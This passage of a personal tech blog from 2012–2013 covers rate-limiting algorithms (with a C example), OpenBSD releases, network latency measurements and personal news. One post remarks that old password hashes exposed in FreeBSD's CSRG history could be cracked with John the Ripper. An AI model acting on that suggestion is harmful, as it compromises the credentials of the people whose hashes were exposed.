that you can fire off a packet, wait 5 seconds and fire off 2 more, then when
the sixth second is passed you send off 3 more packets so in 7 seconds you can
fire off 6 packets which isn't exactly what the rate of packets per second
says.  However given 12 seconds it averages out because you wait 5 seconds from
those passed 7 seconds and don't allow anymore packets during that time.  Then
on the 13th second you can fire off 3 more packets.

Second way
----------

To alleviate the "burst" problem of above you can add more memory resources
and add more timestamps.  You allocate 3 timestamps for 3 packets per 6 seconds.
Then you make two counters.  One for the position of the last timestamp and
one for the amount of packets that passed.  So then when you start this
you send a packet and it saves the timestamp in timestamp[counter1] it then
increases counter1 and counter2.  Next packet comes in a second later, it
checks timestamp[counter1 - counter2] if it has been under 6 seconds then
add the timestamp to timestamp[counter1] and increase both counter1 and
counter2. 5 seconds later another packet comes in, the first timestamp is now
"expired" and gets set to 0, also counter2 gets decreased by one.  This 
ensures that we know how many timestamps exist.  We then check 
timestamp[counter1 - counter2] and if the offset in time is under 6 seconds
then we add another timestamp in timestamp[counter1].  The tricky part is
to deal with wrap-arounds.  Ie. if you have 3 timestamps you can only fill
timestamp[0], timestamp[1], timestamp[2] before going back to timestamp[0],
which likely has been blanked otherwise the packet is dropped.

I invite you to provide clarifications and addendums,

-peter
:-)
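
Both ways written out in C, as an added example rather than code from the post; the struct and function names, the whole-second timestamps and the arrival trace are assumptions made for illustration. It replays the burst from the first description (one packet at second 0, two at second 5, three at second 6) through each limiter.

```c
#include <stdint.h>
#include <stdio.h>

#define LIMIT	3	/* packets allowed ... */
#define WINDOW	6	/* ... per this many seconds */

/* First way: one timestamp and a counter. */
struct fixed_rl {
	int64_t start;		/* timestamp that opened the current window */
	int count;		/* packets passed in that window */
	int active;		/* 0 until the first packet arrives */
};

int
fixed_allow(struct fixed_rl *r, int64_t now)
{
	if (!r->active || now - r->start >= WINDOW) {
		r->active = 1;		/* window expired: save new timestamp */
		r->start = now;
		r->count = 1;
		return 1;
	}
	if (r->count < LIMIT) {
		r->count++;
		return 1;
	}
	return 0;			/* quota used up, drop */
}

/*
 * Second way: one timestamp per allowed packet, kept in a ring.
 * head is "counter1" (next slot to fill), used is "counter2"
 * (how many live timestamps exist).
 */
struct sliding_rl {
	int64_t ts[LIMIT];
	int head;
	int used;
};

int
sliding_allow(struct sliding_rl *r, int64_t now)
{
	int oldest;

	/* expire from the oldest end: timestamp[counter1 - counter2] */
	while (r->used > 0) {
		oldest = (r->head - r->used + LIMIT) % LIMIT;	/* wrap-around */
		if (now - r->ts[oldest] < WINDOW)
			break;
		r->ts[oldest] = 0;	/* blank the slot */
		r->used--;
	}
	if (r->used == LIMIT)
		return 0;		/* slot not blanked yet, drop */
	r->ts[r->head] = now;
	r->head = (r->head + 1) % LIMIT;
	r->used++;
	return 1;
}

/* Constructed arrival trace, in seconds: 1 packet, 5 s pause, 2, then 3. */
static const int64_t burst[] = { 0, 5, 5, 6, 6, 6 };

/* Replay a trace through one limiter and count the packets that pass. */
int
replay(const int64_t *t, int n, int use_sliding)
{
	struct fixed_rl f = { 0, 0, 0 };
	struct sliding_rl s = { { 0 }, 0, 0 };
	int i, passed = 0;

	for (i = 0; i < n; i++)
		passed += use_sliding ? sliding_allow(&s, t[i]) :
		    fixed_allow(&f, t[i]);
	return passed;
}

int
main(void)
{
	printf("first way:  %d of 6 passed\n", replay(burst, 6, 0));
	printf("second way: %d of 6 passed\n", replay(burst, 6, 1));
	return 0;
}
```

The first way lets all six packets through within seven seconds; the second passes four, and no six-second span ever contains more than three.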



A Planet around Alpha Centauri-B

October 18th, 2012

News reached us of a planet around Alpha Centauri B with a few properties. It is around 1% of one AU far from AC-B. That makes me think it's tidally locked. Tidally locked means that only one part of the planet faces the star. Sorta like our moon is tidally locked with our earth. So then they say the surface temperature is 1200 degrees Celsius. But what's the temperature on the far side? Since Alpha Centauri is a tri-star system there are 2 more stars that can light the far side. However AC-A and Proxima Centauri are too far away (over 11 AU) and would probably not heat the surface much. So then the question comes up whether there is an atmosphere, because an atmosphere could spread heat around the far side, kinda like what's happening on Venus. If there is no atmosphere there is probably not life as we know it but the far side could be cool(er). Because the orbit is 3.2 days around AC-B, the far side would be in view of AC-A 50% of the time, meaning there is a day-night cycle every 78 hours or so, so 38 hours day and the rest night. I think this is an interesting exoplanet, and we can only hope to see more about it in the news to come.



Digits of Pi

October 18th, 2012

I wish they would have explained how to calculate the digits of Pi. Because who can remember a constant number? It would have made a great computer class.



NetBSD 6.0 was released yesterday

October 19th, 2012

Congratulations to that team. R.I.P. to who it was dedicated to. Here is the NetBSD home page or just follow one of the links all over this blog.



EuroBSDCon 2012 starts tomorrow

October 19th, 2012

EuroBSDCon 2012 starts tomorrow in Warsaw, Poland. I won't be going there this year but it's hard to believe that it's been a little over a year since EuroBSDCon 2011 near Amsterdam.

OpenBSD will likely add a few more papers of talks held at EuroBSDCon 2012, and I always check for those, as they're usually interesting.



FreeBSD repository now has CSRG in svn

October 20th, 2012

The FreeBSD repo now has the CSRG revisions in its SVN. And they made a blooper. If you're interested in what people's first dog's name was then you can crack these passwords. Remember this is from the late 80's and early 90's where people still thought DES was secure or didn't understand that their password would follow them to 2012, where cracking with dictionary attack tools such as John the Ripper exists and is widely successful. Now I'm not saying you should crack these passwords but if you wanted to then you could.



Very satisfied with the new Mac Mini (not bought yet)

October 24th, 2012

Yes, Apple has released a new Mac Mini. It has USB3 and a more powerful processor. Both I like. It also accepts 16 GB of RAM. That I like and I want to max my Mac Mini when I get it.

Mac mini specs



In five days I'll be making a great announcement

October 26th, 2012

I'm not going to go into details but I can hardly wait in anticipation. I have told a few people already and some think I'm nuts and others think I'm brave.



Big Donation to OpenBSD

October 28th, 2012

OK, this is the big announcement, it's a bit early but I need to visit my bank tomorrow so I want to give them the transaction then. Call this the Halloween donation just in time for the November 1st OpenBSD 5.2 release. The amount is for a staggering 411 Euros. This brings this years donations to 511 euros. I don't want anything in return other than the recognition on the OpenBSD donations page, which I'm already listed on so this doesn't make a change. Take it this way. I use OpenBSD at work, and without OpenBSD I would have no work, so this is justified to me. Thanks OpenBSD. Future donations will be more or less depending on my income.

I put OpenSMTPD on the purpose of the transaction, because they have been very kind with me, but this money isn't solely for them but OpenBSD in general.



Halloween Germany 2012

October 31st, 2012

Hooooooooo! Hooooooo! Scary movie! No! It's Halloween in Schweinfurt. Here are some pictures, including our first trick'o'treaters.


These guys look pretty scary!



OpenBSD 5.2 Release day!

November 1st, 2012

Today OpenBSD 5.2 gets released. Because it is headquartered in Canada the announce may come a bit later as here in Europe we're a few hours ahead of them. Here is the release page, it has all information that you need to download or order OpenBSD 5.2. I personally have used and bought OpenBSD since the 2.5/2.6 days where my personal OpenBSD workstation was called geeklab.globalserve.net in 1997. Today OpenBSD is much more secure than it was back then which is good since OpenBSD focuses on security (but not just! but also functionality and openness). Why is it important to be secure, yet functional? Well when you're faced with securing something often you disable the service completely which is the opposite of functional. In OpenBSD services are secured by a multitude of attack prevention mechanisms. You may want to look at strlcpy/strlcat which was among the first changes that OpenBSD did. And then there is W^X (W xor X) and ottomalloc which are supposed to prevent stack and heap overflow attacks. Before I bore you, I'll just say "It's celebration day!" and leave you with that. Finally congrats to the OpenBSD'ers who made it all happen.



Kaspersky Anti-Virus 2012 blocks my captchas

November 4th, 2012

Today I wanted to write a blog comment on my own blog and found that the captcha images didn't load completely, rendering them useless. So after searching for 2 hours around my system, the net and my parents' home network I was able to isolate the error to my workstation which is Windows 7 - 64 bit. My mom's Linux on the same LAN rendered the image fine. I tested this on 3 sorts of browsers (Safari, Firefox, and IE) and every time it was blocked. So someone asked me to turn the firewall off and that didn't do it, and then as a test I turned web inspection off on the AV 2012 and the image loaded.

So now I've sent Kaspersky a support email to look into this.



The Main river produces 118 MW electricity

November 5th, 2012

I got a list of power generation stations of the Main river from the german wikipedia, and this is how I got to the result:

$ history
1       more main.txt
2       awk '{print $NF}' main.txt | grep [0-9] | tr -d . \
| awk '{total += $0} END {printf("total: %ld\n", total);}'
total: 118640

Now this is probably only the peak draw, however judging from the flow of water through the turbines in Schweinfurt it's pretty steady all the time.



Purchasing a Mac Mini

November 7th, 2012

Tomorrow I'm going to purchase an Apple Mac Mini. It'll be the faster version with 16 GB (maxed) RAM. On Monday, when I got a quote, the store I'm buying it from said they won't get them delivered until next week, so I'll have to wait a little but the purchase goes out tomorrow.

I'm buying this computer for a new stand-up desk that I'm also going to purchase so I'm going to eventually buy a new monitor as well.



My C Primer hits 20,000 views

November 10th, 2012

Over night, the counter to my C Primer will turn to 20,000. Thank you to all who read it. It took a little under a year to do the second 10K. That's an average of 29 or so per day. Also we're nearing 1 million views on Hackepedia itself, which is a great feat. I'll make another announcement when that happens (probably around December 1st).



Citation needed(tm)

November 13th, 2012

Wikipedia is back to fundraising. I won't be donating any money to them this year because I'm still peeved off that a contribution of mine to wikipedia has been censored/retracted. There exists some real bureaucracy in wikipedia, and it needs to change otherwise people will look elsewhere, or even fork.



Why Open Source works (reiterate my point)

November 20th, 2012

I have a success story to tell you, well partially. While someone else is programming driver support into my netbook's (saturn) internal wifi, I went out and bought a wireless dongle. To my shock it wasn't supported with OpenBSD and then I did what any half-clued would do.. that is to see if I can hack support into it. And it worked.



The Space Program(tm)

November 21st, 2012

So in my eyes Europe has lost out. They cancelled the moon rover and went ahead with the Ariane 5ME. And the winner is? Commercial US space programs. It was Elon Musk of Space X that said Ariane 5 can't compete with the Falcon 9 and heavy Falcon rockets. Apparently the world agrees as Space X has 4 dozen outstanding contracts to deliver satellites to orbit.

In my eyes Mars is interesting but not _that_ interesting. The moon is the ugly gem. What we need as the human race is manufacturing on the moon. Only from the moon can we make it beyond earth orbit. Putting up material from earth is too expensive, so I see the moon is similar to a VPS on the Internet, if it can sustain itself via remote control then everything is alright.

One of my personal beliefs is that the moon has plenty of resources that we can use. We can use the iron, the aluminum and even the stones on the moon. And best of all we can use the moon's gravity. I have a feeling it's just enough to allow long missions. Imagine being 3 years away from earth! So far the record isn't even half that. Yes we'll always be dependent on resources from earth but if lastly the only resource from earth is humans then we got it made. Space link.



Fibre Optics in Schweinfurt?

November 23rd, 2012

According to this german article we can expect Fibre Optic cabling (FTTH) to the home by end of 2014. So 2015 is reasonable. The Deutsche Telekom would be laying all the fibre and the cost would be around 20 million euros.

This would be good for me since the Internet is my sole means of income. I do remote system administration currently (a work from home type job).



KNF Kongress 2012 - Complex World...

November 26th, 2012

The KNF which I'm a member of is an organization centered around networking and digital communication of Franconia (a region in Germany). Every year they have a Con and it's called "KNF Kongress" and this years con was about "Komplexe Welt - in und um das Internet", so in english "complex world - in and around the Internet". The con is held in Nuremberg at the Ohm College. Here is how it went down for me:

I got to the venue at 10:25 and it was too late to get to the early talks. So I set my laptop up with the KNF wireless, which turned out to be pretty intermittent in quality throughout the day. All the talks were being held in german so I'm gonna translate it to english on what I saw and heard.

The first talk I went to then was "OpenSeaMap - Status und aktuelle Projekte". This talk was being held by Markus Baerlocher. I didn't know anything about OpenSeaMap (google it) prior so this was an interesting talk. The status on the project was that they need developers and servers (mostly for storage).

Then there was lunch, and pizza. :-)

Next I attended the "mbed - der schnellste Einstieg in Web-basierte Steuerung und Regelung" by Jochen Krapf. This was an inspiring talk and demonstration by Jochen but I gotta admit I didn't know C++ or electronics all that well so there was about 5% of things I didn't grok. Otherwise a very nice talk about mbed.org which is sorta like arduino.

After that the mbed talk continued with another person Christian Besenreiter who required a dhcp server. Lastly it was my netbook running OpenBSD which provided that function. Chris showed us three real live examples of metering electric current with mbed. In the end Jochen had a few more words which cut into our coffee break. Both of these talks were very well done and the highlight of the day.

The last talk I attended was by Richard Lippmann about "Sicherung virtueller Server Umgebungen" which was a niftily thought-out demonstration how virtual environments make backups and snapshots. Only in the end I was a little disappointed because it was over so soon. Richard is a very good presenter.

And finally we had a Jam Session where anyone could go to the beamer and present a project. This was very well done and I think I'll do this next time as well. Perhaps I can talk about wildcarddnsd and its development.

By the time I got to the Nuremberg main train station it was 18:20 and my next train would depart at 19:00. It took a while but I got home at 20:30 and my dad picked me up from the train station in Schweinfurt.



I got a new apartment

December 06th, 2012

I got a new apartment. The old apartment is in the same condition as it was in August, so nothing had been done. So I cancelled it.

The new apartment has a lot more space, and includes a work room where I can work in and then close the door at the end of the day. Also it's close to shopping amenities so I'll probably have a better quality of life. I'm pretty happy. Despite the setbacks in 2012, this year has been pretty good to me.



Tomorrow we'll reach 1 million views!

December 7th, 2012

We got a million views. Yashy, hawson, whoever else contributed Franks, give yourself a pat on the back. We did it! But first some history. I started writing in hackepedia on October 5th, 2005 in the stdin article. Soon followed stdout and stderr. Now it's 7 years 2 months later or 2618 days later. A lot has changed. And we got 381 views every day since then on average. In the most recent additions to hackepedia I have been writing the C Primer which turned out to be very popular. A lot of demand for learning C is out there. I plan on furthering the C Primer by translating it to german, we'll see how I do that, I also want to open the C primer to others edits so that we can get more examples of code perhaps. All in due time. This is really a spectacular moment!



2012 - Year in review

December 10th, 2012

Last year I did the review on the 10th of December as well so I'm going to do this years on the 10th as well. Here is what happened in 2012:

December 11th, 2011 my program Natally is able to do IPv6 by disabling IPv4 NAT.
December 23rd, 2011 I left facebook for good.  Thanks Eva for encouraging me!
December 27th, 2011 Donated 10 euros to the Pirate Party of Germany.
December 28th, 2011 Changing ad banners at the top of my blog.
January 1st, 2012 turning off WPS as a vulnerability was found, happy new years!
January 2nd, wikimedia releases stats that 1 million donors contributed 
	20 dollars on average.  Wikipedia gets 470 million visitors a year.
January 6th, new commenting system.
January 9th, setting up iked on OpenBSD (my story).
January 14th, bought some jamaican reggae and some Nukky Grissom off iTunes.
January 15th, FreeBSD 9.0 is released as well as PC-BSD 9.0.
January 18th, Removed the web mirror that was on uranus.centroid.eu (DSL).
January 27th, I describe what my dream smartphone would be like.
January 28th, Wildcarddnsd is fixed on big endian machines particularly the macppc.
February 13th, Information and its exchange and new stickers on Jupiter and Mars.
February 19th, I observed the real Jupiter and Venus very bright in the night sky.
February 28th, donated 100+ Euros to *BSD projects.
February 29th, Free Buju Banton.
March 2nd, got notice that my contract work would not get renewed.
March 14th, pre-ordered OpenBSD.
March 16th, bought an ACER Aspire One netbook and named it Saturn.
March 23rd, checking Randomness on Debian.
March 24th, the Venus glider.
March 30th, Interesting findings about older Airport Express Access Points.
March 31st, pictures of my workbench.
April 4th, SVPRadio One year anniversary.
April 6th, ordered 3 books from Amazon.
April 8th, added a robots.txt file that disallows bots to go into my blog.
April 18th, 26 years of Personal Computing History.
April 19th, Jupiter (computer) gets a new fan.
April 28th, New job, first week.
April 29th, got a new book from Amazon.
April 29th, BOINC processing coming to an end.
May 1st, OpenBSD 5.1 Released, Jupiter (computer) built with OpenBSD.
May 11th, io.solarscale.de needed a fsck.
May 23rd, what to do about ports (space issue).
May 27th, ordered 4 more books from Amazon.
June 1st, World IPv6 day.
June 2nd, home network fully at OpenBSD 5.1.
June 3rd, Venus transit approaching.
June 30th, China puts its first woman into space.
June 30th, Going to the moon?  You'll need this!
June 30th, Fritzbox 7930 NAS too slow!
July 6th, A bit disappointed with dspam.
July 13th, Donated 50 euros to OpenBSD.
August 2nd, Five technologies of the future.
August 4th, Why I don't trust the ITU.
August 5th, Why landing on mars may not be a good idea (for humans).
August 7th, the distance of Mars (planet) today.
August 14th, (My open source projects) left Sourceforge.
August 15th, fire in my building, uranus (computer) is off.
August 17th, 6-8 Weeks (it should take for me to move back into my apartment).
August 25th, a red sky over schweinfurt at dawn.
August 25th, Neil Armstrong dies. 
September 3rd, how not to succeed (in trojan programming).
September 4th, registered virgostar.net.
September 8th, Ritesh Agarwal leads development of an optical NAND gate.
September 9th, ordered OpenBSD 5.2 from Lehmanns.de
September 10th, purchased/leased a new VPS in Hong Kong.
September 21st, Privacy: they know who you are anyways.
September 30th, Purchased online-backup storage (strato hidrive).
October 1st, Bad cryptography: a one time pad.
October 5th, My top 8 genres in my iTunes collection.
October 13th, Seti@home has failed.
October 17th, two algorithms for rate-limiting.
October 18th, a planet around alpha centauri-B.
October 19th, NetBSD 6.0 was released yesterday.
October 24th, I want to buy a mac mini.
October 28th, Big donation to OpenBSD.
October 31st, Halloween in Schweinfurt.
November 1st, OpenBSD 5.2 is released.
November 5th, The Main river produces 118 MW of electricity in total.
November 7th, tomorrow I'm purchasing a new Mac Mini.
November 10th, My C Primer hits 20,000 views.
November 20th, Why Open Source works.
November 21st, The european space program.
November 23rd, Fibre Optics in Schweinfurt?
November 26th, KNF Kongress 2012 - Complex World...
December 6th, I got a new apartment.
December 9th, 1 million views at Hackepedia.org.



Purchased two books

December 13th, 2012

I purchased two books on iPhone programming. Now that I have the mac mini I'm able to program in that area with xcode. The simulator will allow me decent results, but eventually I'm wanting to buy an ipod touch for IOS programming. That's where my spare time in 2013 will likely go to.



Decided to expire goldflipper.net

December 14th, 2012

Less is more. And I got to trim the fat a little on domain ownership. So what I've done is take out goldflipper.net out of dns server entries for all my domains and replaced it with americas.centroid.eu. I also asked my vps provider in panama to rename the vps from goldflipper.net to americas.centroid.eu, and adjust reverse dns.



Registered AmDeutschhof.de

December 18th, 2012

After deciding to expire goldflipper.net, I registered amdeutschhof.de as that is the street I'm living on in a part of Schweinfurt called Deutschhof. I intend to give neighbours an email redirect service with this, although I'm unsure how popular it would be.



December solstice in three days

December 18th, 2012

The december solstice is in three days. Interesting I find that wikipedia calls this also the "southern solstice". Have fun with this info. What does it really say? It means that at high noon on the 21st the sun is at its lowest point in the sky (due to the earths tilt). It also means the shortest day of the year, but it also means that going forward after this days will increase in length again (at least until the next June solstice). If the 21st is the end of the world will have to be seen, but I personally have my doubts. :-).



Planets aligned on the 21st?

December 18th, 2012

I'd say no. Take a look what xephem showed, edited with gimp.



My Spaceship

December 22nd, 2012

When I was a boy of around 12 years old, I would draw space ships. One favourite of mine was redrawing the run-about of STNG. This is roughly what it looked like as I drew it.

Notice it had some sort of propulsion that glows, at the back and at the bottom of the ship. Yes it may be an array of ion propulsion who knows..it had a nearly endless supply of energy to transport people between stars in sub-lightspeed speeds. Perhaps at an 8th of a lightyear-year.



Merry Christmas!

December 24th, 2012

Merry Christmas, the 7 angels sing! Dr. Nic came on the sixth, and brought presents with him! Or something like that... Merry Christmas!



Frankfurt-Helsinki in 6 hours by rail?

December 28th, 2012

China reportedly has a train that covers 2300 kilometers in 8 hours between Beijing and Guangzhou. I'm sort of jealous of that. I wish Europe would have similar efforts. For starters between Helsinki and Frankfurt (through the not yet built Helsinki-Tallin(?) tunnel) with a stop in Warsaw, Poland. That would rock and has a distance of around 1800 kilometers. If we can put ICE trains to use they could scoot through the east-baltic regions like darts.

Of course going down Frankfurt to Gibraltar would be cool too. However I'm sure the Polish, Estonians, Latvians and Lithuanians would probably be more willing to have an ICE train roll through their countries than France having anything other than a TGV roll through theirs.



Looking for love in all the wrong places

December 28th, 2012

I just signed up for a love-matchmaker again. It's the same story, you gotta pay to read messages from others, so it's really worthless. I'd pay but the contract automatically renews itself unless I FAX them to stop doing so. I hate doing that. I want to pay for a limited amount of time to unlock all features and not have to worry that something is eating on my savings after. Anyone know any good matchmakers? That do what I want?



Happy New Year 2013

December 31st, 2012

This may just be the last post of 2012 and the first post of 2013 worldwide. Happy New Year! Thanks for stopping by my blog. When I'm fully moved in to my new apartment and everything is connected I'll have a backlog of releasing to do for wildcarddnsd and perhaps natally, and fire irc (these are programs I develop).



Got a new monitor

January 7th, 2013

Because I'm building a stand-up station for my work I needed another monitor. I got it today, a 27" monitor. It's an ACER the same as my Netbook. I also got a new office chair because the old one was uncleanable after the fire.



How a base on Phobos could look like

January 7th, 2013

In this article, I let you know a little how a trip to Mars could look like. See this picture which is a moon-base on the moon Phobos that orbits Mars where a tracked centrifuge module exists that spins and creates artificial gravity (sideways) for the astronauts. There are many rockets for the habitat, gravity centrifuge and rocket home as well as sat uplinks and dishes for the communications back to earth.

Just a bit out of my imagination trunk...



Got a new book on WLAN's

January 10th, 2013

In fact it's my first book that describes wireless LANs and its protocols. It seems to be a good book at first glance. The book's name is "Wireless LANs" by Jörg Rech and is written in German.



Fibre Optics in the Canadian North

January 11th, 2013

These days the winter is pretty mild in Germany. But pretend you live in Nunavut, Canada. It must be freezing, it's the Arctic. I have a friend who lives there. I believe his Internet he gets through a satellite uplink, which is pretty cool. But imagine this arcticfibre.com, this would really fix their Internet up there. And it would fix mine as well. Look at this route from Germany to my VPS in Hong Kong:

 4  f-ed6-i.F.DE.NET.DTAG.DE (62.154.15.2)  55.820 ms  53.301 ms  59.920 ms
 5  ffm-b12-link.telia.net (213.248.103.169)  51.417 ms  51.289 ms ffm-b12-link.telia.net (213.248.79.201)  50.974 ms
 6  ffm-bb2-link.telia.net (213.155.132.210)  52.657 ms ffm-bb1-link.telia.net (213.155.135.8)  137.400 ms ffm-bb1-link.telia.net (213.155.132.208)  56.959 ms
 7  nyk-bb2-link.telia.net (213.155.135.63)  143.458 ms  216.887 ms nyk-bb2-link.telia.net (213.155.131.151)  146.343 ms
 8  sjo-bb1-link.telia.net (80.91.245.96)  221.688 ms sjo-bb1-link.telia.net (80.91.254.177)  215.269 ms  216.198 ms
 9  hnk-b2-link.telia.net (213.155.132.190)  331.143 ms  329.440 ms  329.417 ms
10  hostvirtual-ic-300085-hnk-b2.c.telia.net (213.248.66.102)  331.984 ms  333.287 ms  333.618 ms
11  moon-a.virgostar.net (103.6.85.219)  379.59 ms  378.726 ms  377.172 ms

Now if this route isn't faked it goes through the following cities:

  1. Frankfurt (ffm) in hop 6
  2. New York (nyk) in hop 7 (100 ms latency added)
  3. San Jose, California (sjo) in hop 8 (70 ms latency added)
  4. Hong Kong (hnk) in hop 9 (115 ms latency added)

Now they say the distance between London and Tokyo over arctic fibre is gonna be 15600 kilometers. Wikipedia says that the speed of light through optical fibre is roughly 200,000 kilometers per second, so it would take 78 ms. So then we do a couple of soundings, from my house to London:

$ ping www.linx.net
PING ivory.linx.net (195.66.232.53): 56 data bytes
64 bytes from 195.66.232.53: icmp_seq=0 ttl=58 time=70.111 ms
64 bytes from 195.66.232.53: icmp_seq=1 ttl=58 time=64.192 ms
64 bytes from 195.66.232.53: icmp_seq=2 ttl=58 time=65.072 ms
--- ivory.linx.net ping statistics ---
3 packets transmitted, 3 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 64.192/66.458/70.111/2.616 ms

and from my Hong Kong vps to Tokyo:

PING www.mfeed.ad.jp (210.173.160.18): 56 data bytes
64 bytes from 210.173.160.18: icmp_seq=0 ttl=246 time=58.423 ms
64 bytes from 210.173.160.18: icmp_seq=1 ttl=246 time=58.494 ms
64 bytes from 210.173.160.18: icmp_seq=2 ttl=246 time=58.065 ms

--- www.mfeed.ad.jp ping statistics ---
3 packets transmitted, 3 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 58.065/58.327/58.494/0.188 ms

Add them up and we get 66 + 58 + (2 * 78) = 280 ms. Compare this with the current 379 ms that I'm getting now, a lot of latency added due to routing through the continental USA from New York to San Jose. That's why I'd rather be routed through arctic fibre, which is speedy and secure. My friend in Nunavut would like being on arctic fibre as well and when I emailed him about this he mentioned that they are watching development of this very closely. You can find his blog btw linked from this blog called "Higher Latitudes". I think arctic fibre makes a lot of sense.



Let me explain how the Internet works...

January 19th, 2013

...and how I can work in Canada from Germany.

In order to get Internet to the home we purchase a DSL or Cable link. Sometimes when we're lucky we can even get a Fibre Optic connection directly to the home. Pretend we pay 20 euros a month for this. Where does the money go?

The money goes to the ISP, who has to purchase routers and switches, internal infrastructure and most importantly a link to the outside. There are two types of links that an ISP can connect to. A peering link is one where the ISP usually pays just the connect fees to a peering hub, and any traffic flowing between peers on that hub is free of cost. The second link is a transit link, where the ISP purchases bandwidth from another ISP. That other ISP then transits the flow of internet packets to another ISP and an internetwork of networks is created. Because the ISP requires great bandwidths the transit traffic is usually pretty cheap.

So pretend you get your email from gmail (Google). Google has cleverly situated themselves so that they are available for peering at major peering points, so when I traceroute to gmail.com I actually traceroute to Munich at INXS (an exchange point). When I traceroute from my VPS the route goes to Paris, via DECIX. My ISP probably pays very little for that mail to be checked, but Google on the other hand has to foot the bill for email servers and the network from DECIX to Paris. Anyhow this is an example of how some services are cheaper than others. If I were to pop my mail from an ISP in Canada it would follow a route over transit providers and it's a bit more than just going over peering points.

Yet there aren't all too many teleworkers like me, so the ISPs make a profit on 95% of the population and 5% telework and create costs. Fortunately that includes me. I'm able to use the network here and in Canada because it's all TCP/IP and part of the Internet. The flat fee works because not everyone has to cross the Atlantic Ocean to get their email, web and Facebook. However there is a catch of course. I'm making money in Canada and I have to pay taxes in Germany from the money made, so I'm importing money into the German economy. Or said differently, I'm exporting services overseas. Again not many can claim that.

All in all the order of the Internet is pretty fair. Yes, fees for the end users could go down, but there'll always be peering points and transit providers to upkeep this harmony in the 'net. Remember if a transatlantic cable breaks, there have to be ships ready to sail to repair it. This costs money too. Even though you use only European networks you're paying for those ships that wait until a cable breaks (all indirectly). May not be fair to you but it's fair for the collective, and when you want to use American services you can without creating cost on yourself. It works fabulously IMO.

Further reading:



This year's traffic from Uranus (computer)

January 20th, 2013

Last year I had a snapshot of the yearly traffic of Uranus; this year's was all screwed up due to my move to my parents' house, brought about by the fire in my ex-apartment building.

In August you can see the traffic reversed. That's due to the interface not facing the DSL anymore but being behind another router.



Date correction

January 20th, 2013

I use a script to provide me with a template, to write my articles. I didn't upgrade this script on January 1st so the date erroneously still said 2012. That's fixed now.



Ordered two new books

January 24th, 2013

I have ordered two books, for personal interest:

  1. "Infinite Reality: Avatars, Eternal Life, New Worlds, and the dawn of the Virtual Revolution" by Jim Blascovich. I was made aware of this book by visiting Stanford University's Virtual Human Interaction Lab website.
  2. "Designing Virtual Reality Systems: The Structured Approach" by Gerard Kim. This I picked randomly; I hope it's a good book, it has a hefty price tag.
In another world I was Pi the Druid. This world was called Northern Crossroads MUDD (a multiple user dungeons and dragons game). This game still exists today but I grew out of it. If you're interested you can visit it by going to the MUDD's webpage. I view this game as a forerunner to virtual reality. It is socket based and based off Diku MUDD which was created at a Danish University by their CS department. Everything in the game is ascii based and actions are described by text. I shortly programmed on my own Diku MUDD and it was a lot of fun, so I'm hoping to pick up with virtual reality as the next bridging gap.

Yes well. Virtual reality. It interests me a lot. It scares my mom somewhat as she's worried about mental damage (more of what there is now). But I'm fairly careful I think, and one thing that doesn't interest me is horror or anything that would put anxiety on a user of VR. I'm more interested in healing and discovering myself, to explore my own soul from within so to speak, and I've done a bit of thinking about the topic. So far I still lack a haptic glove and head-mounted display but I'm hoping to get something affordable in the next little while. I have an idea of coupling iOS apps with network communication and virtual reality, I hope to see it through given time.

This reports a little more out of my imagination and my dreams and hopes.



Neat little vmware fusion trick

January 24th, 2013

I noticed that typing control-left arrow and control-right arrow can switch between main screen and vmware guest. This is fancy and quick. I personally go from OpenBSD to Mac OS X between work and personal time.



Bought a backup drive

January 26th, 2013

Usually I always buy a backup drive right away. However planning to buy a new wireless timecapsule didn't work out because I'm still expecting apple to release an 802.11ac access point. The current models are 802.11n and less. But since the capsule is only 100 or so euros more than the airport extreme, I'm gonna go with an extreme instead and plug this new harddrive into it. I bought a 2TB external harddrive btw. This will be enough to back up my mac mini with timemachine.



Time Machine backup really slow

January 28th, 2013

My time machine backup is really slow. It's been backing up 1.5 days now across two nights and only did 38 GB from 282GB to back up. The drive that it's backing up to I timed with dd command to be writing 121 MB/s (roughly twice of what USB2 is capable of) so it doesn't seem to be a speed issue. iostat is bored:

gaia:~ pjp$ iostat -w 1 disk0 disk2
          disk0           disk2       cpu     load average
    KB/t tps  MB/s     KB/t tps  MB/s  us sy id   1m   5m   15m
   36.46   2  0.09    64.24   0  0.01   1  3 96  1.66 1.82 1.94
   53.00   8  0.41     0.00   0  0.00   2  2 96  1.66 1.82 1.94
   26.46  13  0.34     0.00   0  0.00   1  2 96  1.66 1.82 1.94
   80.00   5  0.39     0.00   0  0.00   1  2 96  1.66 1.82 1.94
   38.00   8  0.30     0.00   0  0.00   2  3 95  1.66 1.82 1.94
   44.00  10  0.43   128.00  16  2.00   2  3 96  1.66 1.82 1.94
   17.65  49  0.84     7.33   6  0.04   1  3 95  1.77 1.84 1.94
   38.00   8  0.30     0.00   0  0.00   2  2 96  1.77 1.84 1.94
   29.82  11  0.32     0.00   0  0.00   1  2 96  1.77 1.84 1.94
   53.00   8  0.41     0.00   0  0.00   2  3 96  1.77 1.84 1.94
Let's see, 2MB/s at peak for one second out of ten and the computer is 96% cpu idle. Something is surely wrong.. I suspect it's doing a lot of small files but even then..

I'm at a loss and googling for solutions isn't working either.



DECENTRALIZED

January 29th, 2013

In Germany the electric grid is becoming more and more decentralized. Solar and wind power plants are being created in every region. Wouldn't it then also make sense to decentralize the computers in Germany? I read of all these supercomputer centers and datacenters around regions that serve as Internet hubs, that they are having problems getting guaranteed energy, mostly to cool their arrays of server racks. What we need is a distribution of high speed Internet access and to put large computers to use at home on a distributed computing effort, in my opinion. These computers don't need as much cooling as centralized computers in data centers, saving energy.

PS: I'd like to get away from moving fans to cool computers but rather use LASERS to do that.

So who serves your mail? Perhaps we all need static IP's too, face it privacy is gone anyhow, with static IP's we can receive our own mail and not need large datacenters (and the complexity involved).



IRC

January 30th, 2013

I joined IRC in 1994 or earlier. The very first time I used efnet chat network was when my BBS provider had a door to ircII client or something. There I first hung out in #linux or #linuxhelp and someone helped me upgrading/compiling from Linux 1.2.3 to 1.2.13. I left IRC at that and was MUD'ing on ncmud for a long while but when I noticed a slight addiction I left MUDing. IRC was the addiction to heal my addiction.

